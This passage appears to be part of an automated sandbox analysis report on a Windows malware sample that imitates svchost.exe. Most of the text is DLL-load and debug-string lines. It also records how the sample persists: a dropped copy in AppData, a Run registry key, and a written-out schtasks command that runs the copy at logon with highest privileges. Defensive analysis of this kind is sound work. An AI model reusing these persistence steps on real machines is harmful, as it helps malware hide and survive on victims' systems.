              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: LisectAVT_2403002A_136.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: LisectAVT_2403002A_136.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: LisectAVT_2403002A_136.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdbpte source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svchost.exe, 00000009.00000002.1561024027.0000013898878000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1520877900.0000013F3D2F6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: HC:\Windows\System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1556490544.00000003971E2000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1518275274.0000002190312000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Drawing.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 0000000C.00000002.1520877900.0000013F3D2F6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdbh source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: symbols\dll\System.Windows.Forms.pdb source: svchost.exe, 0000000C.00000002.1518275274.0000002190312000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdbg source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.ni.pdbRSDS source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: !0\??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: svchost.exe, 0000000C.00000002.1518275274.0000002190312000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Core.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbvider source: svchost.exe, 0000000C.00000002.1520490428.0000013F3D2B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb`?y source: svchost.exe, 00000009.00000002.1600531424.00000138B5200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb` source: WERF9D.tmp.dmp.32.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 0000000C.00000002.1520490428.0000013F3D2B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb* H source: svchost.exe, 00000009.00000002.1561362879.00000138988AC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdbdbpdb source: svchost.exe, 0000000C.00000002.1532137769.0000013F57C73000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb* source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: xC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll.pdb source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1556490544.00000003971E2000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1518275274.0000002190312000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb*k source: svchost.exe, 0000000C.00000002.1531557318.0000013F57C13000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: svchost.exe, 00000009.00000002.1602148368.00000138B526F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdbUyJ source: WERF9D.tmp.dmp.32.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdbC:\Windows\System32\OneCoreCommonProxyStub.dll source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: svchost.exe, 0000000C.00000002.1532137769.0000013F57C73000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Xml.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000009.00000002.1600531424.00000138B5200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1561626202.00000138988D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbP%%=? source: WER81B.tmp.dmp.26.dr, WEREACF.tmp.dmp.21.dr
              Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb? source: svchost.exe, 0000000C.00000002.1518275274.0000002190312000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: 91\??\C:\Windows\System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb\??\C:\Windows\symbols\dll\mscorlib.pdbShellItem Shell Namespace helper source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Configuration.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbao source: svchost.exe, 0000000C.00000002.1532137769.0000013F57C73000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000009.00000002.1561626202.00000138988D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1520490428.0000013F3D2B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ()\??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1602148368.00000138B526F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1520417366.0000013F3D299000.00000004.00000020.00020000.00000000.sdmp, WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: mscorlib.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Windows.Forms.pdbt source: svchost.exe, 0000000C.00000002.1520417366.0000013F3D299000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbok source: svchost.exe, 00000009.00000002.1561626202.00000138988D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdbp+) source: svchost.exe, 00000009.00000002.1556490544.00000003971E2000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Core.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdbF9E-7F9C-4437-8B11-F424491E3931}\ServerF9C-4437-8B11-F424491E3931}\InprocServer32 source: svchost.exe, 00000009.00000002.1601737927.00000138B525E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1531557318.0000013F57C6E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb0 source: WERF9D.tmp.dmp.32.dr
              Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb8 source: svchost.exe, 00000009.00000002.1556490544.00000003971E2000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdbn source: svchost.exe, 00000009.00000002.1600531424.00000138B5200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.VisualBasic.pdbMZ@ source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: symbols\dll\System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1556490544.00000003971E2000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdbP source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: LisectAVT_2403002A_136.exeStatic PE information: 0x844420D2 [Thu Apr 26 12:49:22 2040 UTC]
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041A8DA
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B1258B push ebx; retf 0_2_00007FF887B1258A
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B100BD pushad ; iretd 0_2_00007FF887B100C1
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B1257D push ebx; retf 0_2_00007FF887B1258A
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B12518 push ebx; retf 0_2_00007FF887B1258A
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B1E28A pushad ; ret 0_2_00007FF887B1E2A9
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887C00245 push esp; retf 4810h0_2_00007FF887C00312
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B0258B push ebx; retf 9_2_00007FF887B0258A
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B000BD pushad ; iretd 9_2_00007FF887B000C1
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B0257D push ebx; retf 9_2_00007FF887B0258A
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B02518 push ebx; retf 9_2_00007FF887B0258A
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B1B766 pushad ; ret 9_2_00007FF887B1B76C
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B0E28A pushad ; ret 9_2_00007FF887B0E2A9
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887BF0245 push esp; retf 4810h9_2_00007FF887BF0312
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887AF258B push ebx; retf 12_2_00007FF887AF258A
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887AF00BD pushad ; iretd 12_2_00007FF887AF00C1
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887AF257D push ebx; retf 12_2_00007FF887AF258A
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887AF2518 push ebx; retf 12_2_00007FF887AF258A
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887B0B766 pushad ; ret 12_2_00007FF887B0B76C
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887AFE28A pushad ; ret 12_2_00007FF887AFE2A9
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887BE0245 push esp; retf 4810h12_2_00007FF887BE0312
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004000D8 push es; iretd 13_2_004000D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040008C push es; iretd 13_2_0040008D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004542E6 push ecx; ret 13_2_004542F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0045B4FD push esi; ret 13_2_0045B506
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00432BD6 push ecx; ret 13_2_00432BE9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00454C08 push eax; ret 13_2_00454C26
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004000D8 push es; iretd 19_2_004000D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0040008C push es; iretd 19_2_0040008D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004542E6 push ecx; ret 19_2_004542F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0045B4FD push esi; ret 19_2_0045B506
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00432BD6 push ecx; ret 19_2_00432BE9

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004063C6 ShellExecuteW,URLDownloadToFileW,13_2_004063C6
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_00418A00
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
